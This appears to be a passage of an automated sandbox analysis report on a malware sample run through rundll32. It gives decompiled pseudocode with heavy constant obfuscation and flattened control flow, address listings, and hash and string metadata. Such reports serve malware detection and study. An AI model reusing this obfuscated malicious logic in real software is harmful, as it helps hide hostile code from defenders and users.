                                                                                                                      					if(_t1281 != 0x9905489) {
                                                                                                                      						goto L108;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1279 - _v516;
                                                                                                                      					if(_t1279 == _v516) {
                                                                                                                      						L73:
                                                                                                                      						_t1281 = _t1171;
                                                                                                                      						goto L108;
                                                                                                                      					}
                                                                                                                      					_t1099 = E00175E0B(E0018BE84(), _t1279, _v160, _v596);
                                                                                                                      					_pop(_t1195);
                                                                                                                      					__eflags = _t1099 - _v592;
                                                                                                                      					if(_t1099 == _v592) {
                                                                                                                      						_t1099 = E0017C309();
                                                                                                                      						goto L73;
                                                                                                                      					}
                                                                                                                      					_t1281 = 0x1ef2704;
                                                                                                                      					goto L1;
                                                                                                                      					L108:
                                                                                                                      					__eflags = _t1281 - 0x6c6fdd9;
                                                                                                                      				} while (_t1281 != 0x6c6fdd9);
                                                                                                                      				goto L112;
                                                                                                                      			}
                                                                                                                      0x001923fa
                                                                                                                      0x00192405
                                                                                                                      0x00192410
                                                                                                                      0x0019241b
                                                                                                                      0x00192426
                                                                                                                      0x00192431
                                                                                                                      0x0019243c
                                                                                                                      0x00192447
                                                                                                                      0x00192452
                                                                                                                      0x0019245d
                                                                                                                      0x00192465
                                                                                                                      0x00192470
                                                                                                                      0x0019247b
                                                                                                                      0x00192483
                                                                                                                      0x00192490
                                                                                                                      0x00192494
                                                                                                                      0x0019249c
                                                                                                                      0x001924a4
                                                                                                                      0x001924b7
                                                                                                                      0x001924be
                                                                                                                      0x001924c6
                                                                                                                      0x001924d1
                                                                                                                      0x001924dc
                                                                                                                      0x001924e4
                                                                                                                      0x001924ef
                                                                                                                      0x001924fa
                                                                                                                      0x00192505
                                                                                                                      0x00192518
                                                                                                                      0x0019251d
                                                                                                                      0x00192524
                                                                                                                      0x0019252f
                                                                                                                      0x00192537
                                                                                                                      0x0019253f
                                                                                                                      0x00192547
                                                                                                                      0x0019254c
                                                                                                                      0x00192554
                                                                                                                      0x0019255f
                                                                                                                      0x0019256a
                                                                                                                      0x00192575
                                                                                                                      0x0019257d
                                                                                                                      0x00192581
                                                                                                                      0x00192589
                                                                                                                      0x0019258e
                                                                                                                      0x00192596
                                                                                                                      0x001925a1
                                                                                                                      0x001925ac
                                                                                                                      0x001925b7
                                                                                                                      0x001925c2
                                                                                                                      0x001925d6
                                                                                                                      0x001925db
                                                                                                                      0x001925ec
                                                                                                                      0x001925ef
                                                                                                                      0x001925f6
                                                                                                                      0x00192601
                                                                                                                      0x00192609
                                                                                                                      0x00192616
                                                                                                                      0x0019261a
                                                                                                                      0x0019261f
                                                                                                                      0x00192627
                                                                                                                      0x00192632
                                                                                                                      0x0019263d
                                                                                                                      0x00192648
                                                                                                                      0x00192653
                                                                                                                      0x0019265b
                                                                                                                      0x00192666
                                                                                                                      0x00192671
                                                                                                                      0x0019267c
                                                                                                                      0x00192687
                                                                                                                      0x00192692
                                                                                                                      0x0019269d
                                                                                                                      0x001926b3
                                                                                                                      0x001926ba
                                                                                                                      0x001926c5
                                                                                                                      0x001926d0
                                                                                                                      0x001926e0
                                                                                                                      0x001926e1
                                                                                                                      0x001926e8
                                                                                                                      0x001926f3
                                                                                                                      0x00192707
                                                                                                                      0x0019270e
                                                                                                                      0x00192719
                                                                                                                      0x00192724
                                                                                                                      0x0019272f
                                                                                                                      0x00192737
                                                                                                                      0x00192742
                                                                                                                      0x0019274a
                                                                                                                      0x00192752
                                                                                                                      0x0019275a
                                                                                                                      0x00192762
                                                                                                                      0x0019276c
                                                                                                                      0x00192774
                                                                                                                      0x0019277c
                                                                                                                      0x00192781
                                                                                                                      0x00192789
                                                                                                                      0x00192794
                                                                                                                      0x0019279c
                                                                                                                      0x001927a7
                                                                                                                      0x001927bb
                                                                                                                      0x001927c0
                                                                                                                      0x001927c9
                                                                                                                      0x001927d4
                                                                                                                      0x001927df
                                                                                                                      0x001927f2
                                                                                                                      0x001927f5
                                                                                                                      0x001927fc
                                                                                                                      0x00192807
                                                                                                                      0x00192812
                                                                                                                      0x00192825
                                                                                                                      0x0019282c
                                                                                                                      0x00192837
                                                                                                                      0x00192842
                                                                                                                      0x0019284a
                                                                                                                      0x0019285d
                                                                                                                      0x00192864
                                                                                                                      0x0019286f
                                                                                                                      0x00192877
                                                                                                                      0x00192884
                                                                                                                      0x00192888
                                                                                                                      0x00192890
                                                                                                                      0x00192898
                                                                                                                      0x001928a3
                                                                                                                      0x001928ae
                                                                                                                      0x001928b9
                                                                                                                      0x001928c4
                                                                                                                      0x001928cf
                                                                                                                      0x001928da
                                                                                                                      0x001928e5
                                                                                                                      0x001928f0
                                                                                                                      0x001928fb
                                                                                                                      0x00192906
                                                                                                                      0x00192911
                                                                                                                      0x0019291c
                                                                                                                      0x0019292c
                                                                                                                      0x0019292d
                                                                                                                      0x00192934
                                                                                                                      0x0019293f
                                                                                                                      0x0019294a
                                                                                                                      0x00192955
                                                                                                                      0x00192960
                                                                                                                      0x00192968
                                                                                                                      0x00192970
                                                                                                                      0x00192978
                                                                                                                      0x00192980
                                                                                                                      0x00192988
                                                                                                                      0x00192993
                                                                                                                      0x0019299e
                                                                                                                      0x001929a9
                                                                                                                      0x001929b4
                                                                                                                      0x001929c8
                                                                                                                      0x001929cf
                                                                                                                      0x001929da
                                                                                                                      0x001929e5
                                                                                                                      0x001929f0
                                                                                                                      0x001929fb
                                                                                                                      0x00192a08
                                                                                                                      0x00192a13
                                                                                                                      0x00192a1e
                                                                                                                      0x00192a26
                                                                                                                      0x00192a31
                                                                                                                      0x00192a3c
                                                                                                                      0x00192a47
                                                                                                                      0x00192a52
                                                                                                                      0x00192a5d
                                                                                                                      0x00192a68
                                                                                                                      0x00192a73
                                                                                                                      0x00192a7e
                                                                                                                      0x00192a89
                                                                                                                      0x00192a94
                                                                                                                      0x00192a9f
                                                                                                                      0x00192aa7
                                                                                                                      0x00192ab2
                                                                                                                      0x00192abd
                                                                                                                      0x00192ac8
                                                                                                                      0x00192adc
                                                                                                                      0x00192ae1
                                                                                                                      0x00192ae8
                                                                                                                      0x00192af3
                                                                                                                      0x00192afe
                                                                                                                      0x00192b09
                                                                                                                      0x00192b14
                                                                                                                      0x00192b23
                                                                                                                      0x00192b24
                                                                                                                      0x00192b28
                                                                                                                      0x00192b32
                                                                                                                      0x00192b36
                                                                                                                      0x00192b3e
                                                                                                                      0x00192b49
                                                                                                                      0x00192b54
                                                                                                                      0x00192b5f
                                                                                                                      0x00192b6a
                                                                                                                      0x00192b75
                                                                                                                      0x00192b80
                                                                                                                      0x00192b8b
                                                                                                                      0x00192b96
                                                                                                                      0x00192b9e
                                                                                                                      0x00192ba6
                                                                                                                      0x00192bb1
                                                                                                                      0x00192bbc
                                                                                                                      0x00192bcf
                                                                                                                      0x00192bd6
                                                                                                                      0x00192be1
                                                                                                                      0x00192bec
                                                                                                                      0x00192bf7
                                                                                                                      0x00192c02
                                                                                                                      0x00192c0a
                                                                                                                      0x00192c15
                                                                                                                      0x00192c20
                                                                                                                      0x00192c2b
                                                                                                                      0x00192c36
                                                                                                                      0x00192c41
                                                                                                                      0x00192c57
                                                                                                                      0x00192c5e
                                                                                                                      0x00192c69
                                                                                                                      0x00192c74
                                                                                                                      0x00192c7f
                                                                                                                      0x00192c93
                                                                                                                      0x00192c9a
                                                                                                                      0x00193578
                                                                                                                      0x0019351a
                                                                                                                      0x00193520
                                                                                                                      0x00193556
                                                                                                                      0x0019355b
                                                                                                                      0x00000000
                                                                                                                      0x0019355b
                                                                                                                      0x00193522
                                                                                                                      0x00193528
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00193539
                                                                                                                      0x0019353e
                                                                                                                      0x00000000
                                                                                                                      0x0019353e
                                                                                                                      0x0019321e
                                                                                                                      0x001934c3
                                                                                                                      0x001934d8
                                                                                                                      0x001934df
                                                                                                                      0x001934e4
                                                                                                                      0x001934e7
                                                                                                                      0x001934ee
                                                                                                                      0x00000000
                                                                                                                      0x001934ee
                                                                                                                      0x00193224
                                                                                                                      0x0019322a
                                                                                                                      0x0019333d
                                                                                                                      0x00193343
                                                                                                                      0x0019349f
                                                                                                                      0x001934a4
                                                                                                                      0x00000000
                                                                                                                      0x001934a4
                                                                                                                      0x00193349
                                                                                                                      0x0019334f
                                                                                                                      0x0019344b
                                                                                                                      0x00193450
                                                                                                                      0x00193452
                                                                                                                      0x00193475
                                                                                                                      0x0019347e
                                                                                                                      0x00193486
                                                                                                                      0x00000000
                                                                                                                      0x00193486
                                                                                                                      0x00193458
                                                                                                                      0x00193461
                                                                                                                      0x00193463
                                                                                                                      0x00000000
                                                                                                                      0x00193463
                                                                                                                      0x00193355
                                                                                                                      0x0019335b
                                                                                                                      0x00193665
                                                                                                                      0x00000000
                                                                                                                      0x00193665
                                                                                                                      0x00193361
                                                                                                                      0x00193367
                                                                                                                      0x0019339c
                                                                                                                      0x001933cb
                                                                                                                      0x001933ec
                                                                                                                      0x001933f8
                                                                                                                      0x00193412
                                                                                                                      0x0019341c
                                                                                                                      0x00193430
                                                                                                                      0x00193437
                                                                                                                      0x0019343c
                                                                                                                      0x0019343c
                                                                                                                      0x00000000
                                                                                                                      0x00193367
                                                                                                                      0x00193230
                                                                                                                      0x0019332e
                                                                                                                      0x00193333
                                                                                                                      0x00000000
                                                                                                                      0x00193333
                                                                                                                      0x00193236
                                                                                                                      0x0019323c
                                                                                                                      0x00193314
                                                                                                                      0x00193319
                                                                                                                      0x00193320
                                                                                                                      0x00000000
                                                                                                                      0x00193320
                                                                                                                      0x00193242
                                                                                                                      0x00193248
                                                                                                                      0x001932f6
                                                                                                                      0x001932fb
                                                                                                                      0x001932fd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00193303
                                                                                                                      0x00000000
                                                                                                                      0x00193303
                                                                                                                      0x0019324e
                                                                                                                      0x00193254
                                                                                                                      0x001932d1
                                                                                                                      0x001932db
                                                                                                                      0x001932e3
                                                                                                                      0x001932e4
                                                                                                                      0x00000000
                                                                                                                      0x001932e4
                                                                                                                      0x00193256
                                                                                                                      0x0019325c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00193262
                                                                                                                      0x00193266
                                                                                                                      0x001932ad
                                                                                                                      0x001932ad
                                                                                                                      0x00000000
                                                                                                                      0x001932ad
                                                                                                                      0x0019328a
                                                                                                                      0x00193290
                                                                                                                      0x00193291
                                                                                                                      0x00193295
                                                                                                                      0x001932a8
                                                                                                                      0x00000000
                                                                                                                      0x001932a8
                                                                                                                      0x00193297
                                                                                                                      0x00000000
                                                                                                                      0x00193642
                                                                                                                      0x00193642
                                                                                                                      0x00193642
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: kJ$*k$/;$7Mv?$@`ST$Mg$N&>$Nv$RiW$XgI8/$Y$[@M$[TA$``$fyI$l$!CG$I8/$M<$d$t}$z
                                                                                                                      • API String ID: 0-363835068
                                                                                                                      • Opcode ID: f5828bbe137a41c160cc0de8772893318bd60bc84d7550a57faaeef3e833dd01
                                                                                                                      • Instruction ID: 8adfb40c95c5b578a1e6396c467ee3fb45c924087e57ee1a7401d8ae08ea85b5
                                                                                                                      • Opcode Fuzzy Hash: f5828bbe137a41c160cc0de8772893318bd60bc84d7550a57faaeef3e833dd01
                                                                                                                      • Instruction Fuzzy Hash: EEC211719093818BD7B8CF24C58ABCBBBE1BB94714F11892DE5DD96260DBB08949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00187BCA(signed int __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _t784;
                                                                                                                      				signed int _t787;
                                                                                                                      				signed int _t791;
                                                                                                                      				void* _t797;
                                                                                                                      				signed int _t807;
                                                                                                                      				signed int _t808;
                                                                                                                      				void* _t827;
                                                                                                                      				signed int* _t829;
                                                                                                                      				signed int _t833;
                                                                                                                      				intOrPtr _t841;
                                                                                                                      				void* _t884;
                                                                                                                      				signed int _t899;
                                                                                                                      				signed int _t900;
                                                                                                                      				signed int _t901;
                                                                                                                      				signed int _t902;
                                                                                                                      				signed int _t903;
                                                                                                                      				signed int _t904;
                                                                                                                      				signed int _t905;
                                                                                                                      				signed int _t906;
                                                                                                                      				signed int _t907;
                                                                                                                      				signed int _t908;
                                                                                                                      				signed int _t909;
                                                                                                                      				signed int _t910;
                                                                                                                      				signed int _t911;
                                                                                                                      				signed int _t912;
                                                                                                                      				signed int _t914;
                                                                                                                      				signed int _t919;
                                                                                                                      				signed int* _t923;
                                                                                                                      				void* _t925;
                                                                                                                      
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(_a32);
                                                                                                                      				_t829 = _a24;
                                                                                                                      				_push(_a28);
                                                                                                                      				_v16 = __edx;
                                                                                                                      				_push(_t829);
                                                                                                                      				_push(_a20);
                                                                                                                      				_v12 = __ecx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4 & 0x0000ffff);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_a4 & 0x0000ffff);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v8 = 0x5b6770;
                                                                                                                      				_t923 =  &(( &_v296)[0xc]);
                                                                                                                      				_v296 = 0xae8f26;
                                                                                                                      				_v24 = 0;
                                                                                                                      				_t827 = 0;
                                                                                                                      				_t914 = 0x83eeb0d;
                                                                                                                      				_t899 = 0x66;
                                                                                                                      				_v296 = _v296 * 0x77;
                                                                                                                      				_v296 = _v296 + 0xffff6317;
                                                                                                                      				_v296 = _v296 | 0x51a667a9;
                                                                                                                      				_v296 = _v296 ^ 0x51a7efe9;
                                                                                                                      				_v220 = 0x22f2e2;
                                                                                                                      				_v220 = _v220 + 0xffff44aa;
                                                                                                                      				_v220 = _v220 / _t899;
                                                                                                                      				_t900 = 0x6e;
                                                                                                                      				_v220 = _v220 / _t900;
                                                                                                                      				_v220 = _v220 ^ 0x000000d4;
                                                                                                                      				_v180 = 0x3b651;
                                                                                                                      				_v180 = _v180 << 0xd;
                                                                                                                      				_v180 = _v180 >> 7;
                                                                                                                      				_v180 = _v180 ^ 0x00ed9488;
                                                                                                                      				_v100 = 0xe67bf2;
                                                                                                                      				_v100 = _v100 + 0x555e;
                                                                                                                      				_v100 = _v100 ^ 0x00e65150;
                                                                                                                      				_v120 = 0x8bcc28;
                                                                                                                      				_v120 = _v120 + 0xffffc7f8;
                                                                                                                      				_v120 = _v120 ^ 0x008bd420;
                                                                                                                      				_v216 = 0x57910f;
                                                                                                                      				_v216 = _v216 ^ 0xab75fa15;
                                                                                                                      				_v216 = _v216 ^ 0x4a558bb8;
                                                                                                                      				_v216 = _v216 << 0x10;
                                                                                                                      				_v216 = _v216 ^ 0xe0e20000;
                                                                                                                      				_v108 = 0xde84ad;
                                                                                                                      				_v108 = _v108 + 0xffffece5;
                                                                                                                      				_v108 = _v108 ^ 0x00da7192;
                                                                                                                      				_v124 = 0x7a6f99;
                                                                                                                      				_v124 = _v124 + 0x7c9;
                                                                                                                      				_v124 = _v124 << 0x10;
                                                                                                                      				_v124 = _v124 ^ 0x73620000;
                                                                                                                      				_v212 = 0x24738c;
                                                                                                                      				_v212 = _v212 + 0xffff84c3;
                                                                                                                      				_v212 = _v212 ^ 0xe5eb5ff0;
                                                                                                                      				_v212 = _v212 * 0x5c;
                                                                                                                      				_v212 = _v212 ^ 0x941448a4;
                                                                                                                      				_v60 = 0x198952;
                                                                                                                      				_v60 = _v60 + 0x4ddc;
                                                                                                                      				_v60 = _v60 ^ 0x0019d52e;
                                                                                                                      				_v48 = 0xba80a;
                                                                                                                      				_v48 = _v48 + 0x1f7d;
                                                                                                                      				_v48 = _v48 ^ 0x000bc687;
                                                                                                                      				_v40 = 0x36c14f;
                                                                                                                      				_v40 = _v40 << 0xc;
                                                                                                                      				_v40 = _v40 ^ 0xec14f000;
                                                                                                                      				_v72 = 0x4ddbf0;
                                                                                                                      				_v72 = _v72 + 0xffff1656;
                                                                                                                      				_v72 = _v72 ^ 0x004cf246;
                                                                                                                      				_v44 = 0x551f62;
                                                                                                                      				_v44 = _v44 ^ 0x64841b78;
                                                                                                                      				_v44 = _v44 ^ 0x64d1045b;
                                                                                                                      				_v152 = 0xb013f0;
                                                                                                                      				_t901 = 0x18;
                                                                                                                      				_v152 = _v152 * 0x52;
                                                                                                                      				_v152 = _v152 ^ 0xa7d20536;
                                                                                                                      				_v152 = _v152 ^ 0x9fb467c9;
                                                                                                                      				_v168 = 0xdb80e;
                                                                                                                      				_v168 = _v168 << 0xc;
                                                                                                                      				_v168 = _v168 + 0x66d3;
                                                                                                                      				_v168 = _v168 ^ 0xdb8146cc;
                                                                                                                      				_v116 = 0x5fff40;
                                                                                                                      				_v116 = _v116 + 0xac16;
                                                                                                                      				_v116 = _v116 ^ 0x0060ab55;
                                                                                                                      				_v28 = 0x8c1e54;
                                                                                                                      				_v28 = _v28 ^ 0x40badf76;
                                                                                                                      				_v28 = _v28 ^ 0x4036c022;
                                                                                                                      				_v296 = 0x412245;
                                                                                                                      				_v296 = _v296 / _t901;
                                                                                                                      				_v296 = _v296 + 0x2cd;
                                                                                                                      				_v296 = _v296 >> 0xf;
                                                                                                                      				_v296 = _v296 ^ 0x00000af3;
                                                                                                                      				_v296 = 0xa8f395;
                                                                                                                      				_t902 = 0x4e;
                                                                                                                      				_v296 = _v296 / _t902;
                                                                                                                      				_v296 = _v296 + 0x6ac4;
                                                                                                                      				_v296 = _v296 << 6;
                                                                                                                      				_v296 = _v296 ^ 0x00ac1221;
                                                                                                                      				_v296 = 0xd124a6;
                                                                                                                      				_t903 = 7;
                                                                                                                      				_v296 = _v296 / _t903;
                                                                                                                      				_v296 = _v296 ^ 0x9d1dae1f;
                                                                                                                      				_v296 = _v296 | 0xe011ad48;
                                                                                                                      				_v296 = _v296 ^ 0xfd13ad6e;
                                                                                                                      				_v296 = 0xfabeb9;
                                                                                                                      				_v296 = _v296 >> 3;
                                                                                                                      				_v296 = _v296 + 0xfffff1c8;
                                                                                                                      				_t904 = 0x7d;
                                                                                                                      				_v296 = _v296 / _t904;
                                                                                                                      				_v296 = _v296 ^ 0x000314ef;
                                                                                                                      				_v296 = 0x1fa60b;
                                                                                                                      				_v296 = _v296 * 0x75;
                                                                                                                      				_v296 = _v296 >> 0xd;
                                                                                                                      				_v296 = _v296 + 0x5a08;
                                                                                                                      				_v296 = _v296 ^ 0x000a0276;
                                                                                                                      				_v292 = 0xde324a;
                                                                                                                      				_v292 = _v292 ^ 0x385f234d;
                                                                                                                      				_v292 = _v292 ^ 0x83f834b0;
                                                                                                                      				_v292 = _v292 ^ 0xbb7de3fa;
                                                                                                                      				_v288 = 0x3fe2ee;
                                                                                                                      				_t208 =  &_v288; // 0x3fe2ee
                                                                                                                      				_t905 = 0x7a;
                                                                                                                      				_v288 =  *_t208 / _t905;
                                                                                                                      				_v288 = _v288 ^ 0x0006d348;
                                                                                                                      				_v288 = 0x668cef;
                                                                                                                      				_v288 = _v288 << 1;
                                                                                                                      				_v288 = _v288 ^ 0x00ccb692;
                                                                                                                      				_v296 = 0x30a71d;
                                                                                                                      				_t906 = 0x6a;
                                                                                                                      				_v296 = _v296 * 0x35;
                                                                                                                      				_v296 = _v296 + 0xfc26;
                                                                                                                      				_v296 = _v296 + 0xffffafb1;
                                                                                                                      				_v296 = _v296 ^ 0x0a154a10;
                                                                                                                      				_v292 = 0x29409b;
                                                                                                                      				_v292 = _v292 << 4;
                                                                                                                      				_v292 = _v292 + 0x774;
                                                                                                                      				_v292 = _v292 ^ 0x029bb852;
                                                                                                                      				_v292 = 0xc87f9a;
                                                                                                                      				_v292 = _v292 >> 8;
                                                                                                                      				_v292 = _v292 >> 0xe;
                                                                                                                      				_v292 = _v292 ^ 0x00086377;
                                                                                                                      				_v292 = 0x96b752;
                                                                                                                      				_v292 = _v292 + 0x721a;
                                                                                                                      				_v292 = _v292 * 0x33;
                                                                                                                      				_v292 = _v292 ^ 0x1e11edab;
                                                                                                                      				_v292 = 0x9caff;
                                                                                                                      				_v292 = _v292 | 0x3ce1fe14;
                                                                                                                      				_v292 = _v292 ^ 0x920c3820;
                                                                                                                      				_v292 = _v292 ^ 0xaeed4fa4;
                                                                                                                      				_v268 = 0x625e2a;
                                                                                                                      				_v268 = _v268 + 0xa90c;
                                                                                                                      				_v268 = _v268 << 5;
                                                                                                                      				_v268 = _v268 + 0xdce3;
                                                                                                                      				_v268 = _v268 ^ 0x0c65276a;
                                                                                                                      				_v276 = 0x811ec0;
                                                                                                                      				_v276 = _v276 << 6;
                                                                                                                      				_v276 = _v276 * 0x18;
                                                                                                                      				_v276 = _v276 | 0xc27c5ff7;
                                                                                                                      				_v276 = _v276 ^ 0xc6f6c0fc;
                                                                                                                      				_v80 = 0xbf5549;
                                                                                                                      				_v80 = _v80 + 0xd976;
                                                                                                                      				_v80 = _v80 ^ 0x00c51c7a;
                                                                                                                      				_v88 = 0xc74c4b;
                                                                                                                      				_v88 = _v88 << 0xf;
                                                                                                                      				_v88 = _v88 ^ 0xa6283482;
                                                                                                                      				_v164 = 0x7a7277;
                                                                                                                      				_t287 =  &_v164; // 0x7a7277
                                                                                                                      				_v164 =  *_t287 * 0x2a;
                                                                                                                      				_t289 =  &_v164; // 0x7a7277
                                                                                                                      				_v164 =  *_t289 * 0x14;
                                                                                                                      				_v164 = _v164 ^ 0x91c2b6e3;
                                                                                                                      				_v172 = 0x8c5cd0;
                                                                                                                      				_v172 = _v172 / _t906;
                                                                                                                      				_v172 = _v172 + 0xffffaf11;
                                                                                                                      				_v172 = _v172 ^ 0x0000520f;
                                                                                                                      				_v208 = 0x96f19c;
                                                                                                                      				_v208 = _v208 >> 0xf;
                                                                                                                      				_v208 = _v208 ^ 0xf87e01d8;
                                                                                                                      				_v208 = _v208 ^ 0xf879a426;
                                                                                                                      				_v64 = 0x5acacd;
                                                                                                                      				_v64 = _v64 << 5;
                                                                                                                      				_v64 = _v64 ^ 0x0b5bfe72;
                                                                                                                      				_v248 = 0xed9818;
                                                                                                                      				_v248 = _v248 + 0xffff852e;
                                                                                                                      				_v248 = _v248 + 0x2b61;
                                                                                                                      				_v248 = _v248 + 0xffff5032;
                                                                                                                      				_v248 = _v248 ^ 0x00eca9ae;
                                                                                                                      				_v196 = 0xd8fc83;
                                                                                                                      				_v196 = _v196 + 0xffffe6c0;
                                                                                                                      				_v196 = _v196 << 7;
                                                                                                                      				_v196 = _v196 ^ 0x6c795a10;
                                                                                                                      				_v104 = 0xa57136;
                                                                                                                      				_v104 = _v104 << 8;
                                                                                                                      				_v104 = _v104 ^ 0xa57ba4e8;
                                                                                                                      				_v112 = 0x619c13;
                                                                                                                      				_t907 = 0x35;
                                                                                                                      				_v112 = _v112 * 0x46;
                                                                                                                      				_v112 = _v112 ^ 0x1ab16c90;
                                                                                                                      				_v284 = 0x3b2abb;
                                                                                                                      				_v284 = _v284 * 0x43;
                                                                                                                      				_v284 = _v284 << 0x10;
                                                                                                                      				_v284 = _v284 << 3;
                                                                                                                      				_v284 = _v284 ^ 0x77883a24;
                                                                                                                      				_v204 = 0xef756c;
                                                                                                                      				_v204 = _v204 | 0xa0746111;
                                                                                                                      				_v204 = _v204 ^ 0x0b05d0bc;
                                                                                                                      				_v204 = _v204 ^ 0xabfd0224;
                                                                                                                      				_v144 = 0x44b7c0;
                                                                                                                      				_v144 = _v144 << 6;
                                                                                                                      				_v144 = _v144 + 0x629;
                                                                                                                      				_v144 = _v144 ^ 0x1122cbf1;
                                                                                                                      				_v228 = 0x31841a;
                                                                                                                      				_v228 = _v228 * 0x38;
                                                                                                                      				_v228 = _v228 ^ 0x4159fb72;
                                                                                                                      				_v228 = _v228 + 0x624a;
                                                                                                                      				_v228 = _v228 ^ 0x4b8ee7c8;
                                                                                                                      				_v232 = 0xc15230;
                                                                                                                      				_v232 = _v232 ^ 0x2fe872e1;
                                                                                                                      				_v232 = _v232 >> 0xe;
                                                                                                                      				_v232 = _v232 + 0xc85e;
                                                                                                                      				_v232 = _v232 ^ 0x00073260;
                                                                                                                      				_v200 = 0xd055c7;
                                                                                                                      				_v200 = _v200 << 0xe;
                                                                                                                      				_v200 = _v200 + 0x1578;
                                                                                                                      				_v200 = _v200 ^ 0x157facd3;
                                                                                                                      				_v132 = 0xe0a83f;
                                                                                                                      				_v132 = _v132 * 0x7b;
                                                                                                                      				_v132 = _v132 >> 0xd;
                                                                                                                      				_v132 = _v132 ^ 0x000704ed;
                                                                                                                      				_v240 = 0x8432d;
                                                                                                                      				_v240 = _v240 | 0xed632ad0;
                                                                                                                      				_v240 = _v240 ^ 0x6858c4b6;
                                                                                                                      				_v240 = _v240 + 0xfdcb;
                                                                                                                      				_v240 = _v240 ^ 0x85392506;
                                                                                                                      				_v192 = 0x8324f8;
                                                                                                                      				_v192 = _v192 * 0x5b;
                                                                                                                      				_v192 = _v192 * 0x35;
                                                                                                                      				_v192 = _v192 ^ 0xa6bebbcd;
                                                                                                                      				_v272 = 0x14de64;
                                                                                                                      				_v272 = _v272 | 0x750df782;
                                                                                                                      				_v272 = _v272 ^ 0x336a958a;
                                                                                                                      				_v272 = _v272 + 0xffff8f03;
                                                                                                                      				_v272 = _v272 ^ 0x467f1cdb;
                                                                                                                      				_v52 = 0x5532de;
                                                                                                                      				_v52 = _v52 >> 6;
                                                                                                                      				_v52 = _v52 ^ 0x00006622;
                                                                                                                      				_v160 = 0xce031d;
                                                                                                                      				_v160 = _v160 | 0xfbc8b092;
                                                                                                                      				_v160 = _v160 * 0x6d;
                                                                                                                      				_v160 = _v160 ^ 0x3708e9e0;
                                                                                                                      				_v36 = 0x5242dc;
                                                                                                                      				_v36 = _v36 >> 7;
                                                                                                                      				_v36 = _v36 ^ 0x000cba3f;
                                                                                                                      				_v92 = 0x339fd7;
                                                                                                                      				_v92 = _v92 + 0xa0d7;
                                                                                                                      				_v92 = _v92 ^ 0x00306e5b;
                                                                                                                      				_v128 = 0xd7d7e5;
                                                                                                                      				_v128 = _v128 * 0x70;
                                                                                                                      				_v128 = _v128 << 0xe;
                                                                                                                      				_v128 = _v128 ^ 0x9d0cda42;
                                                                                                                      				_v264 = 0x31382b;
                                                                                                                      				_v264 = _v264 / _t907;
                                                                                                                      				_t908 = 0x45;
